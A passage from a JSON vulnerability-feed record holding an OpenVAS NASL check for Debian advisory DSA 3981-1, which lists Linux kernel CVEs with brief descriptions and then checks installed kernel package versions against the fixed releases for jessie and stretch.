"CVE-2017-12146", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7558", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-1000370", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000371", "CVE-2017-14497", "CVE-2017-12154", "CVE-2017-11600"], "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\nAndy Lutomirski discovered that KVM is prone to an incorrect debug\nexception (#DB) error occurring while emulating a syscall\ninstruction. A process inside a guest can take advantage of this\nflaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\nStefano Brivio of Red Hat discovered that the SCTP subsystem is\nprone to a data leak vulnerability due to an out-of-bounds read\nflaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\nDmitry Vyukov of Google reported that the timerfd facility does\nnot properly handle certain concurrent operations on a single file\ndescriptor. This allows a local attacker to cause a denial of\nservice or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.", "modified": "2020-06-08T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310703981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703981", "type": "openvas", "title": "Debian Security Advisory DSA 3981-1 (linux - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 3981-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH http://greenbone.net\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703981\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000252\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11600\", \"CVE-2017-12134\", \"CVE-2017-12146\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14497\", \"CVE-2017-7518\", \"CVE-2017-7558\");\n script_name(\"Debian Security Advisory DSA 3981-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 00:00:00 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3981.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.43-2+deb8u5.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u5.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\nAndy Lutomirski discovered that KVM is prone to an incorrect debug\nexception (#DB) error occurring while emulating a syscall\ninstruction. A process inside a guest can take advantage of this\nflaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\nStefano Brivio of Red Hat discovered that the SCTP subsystem is\nprone to a data leak vulnerability due to an out-of-bounds read\nflaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\nDmitry Vyukov of Google reported that the timerfd facility does\nnot properly handle certain concurrent operations on a single file\ndescriptor. This allows a local attacker to cause a denial of\nservice or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-4kc-malta-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-5kc-malta-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-686-pae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-amd64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-arm64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-armmp-lpae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-loongson-3-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-marvell-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-octeon-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-powerpc64le-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-686-pae-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-rt-amd64-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-4.9.0-3-s390x-dbg\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n 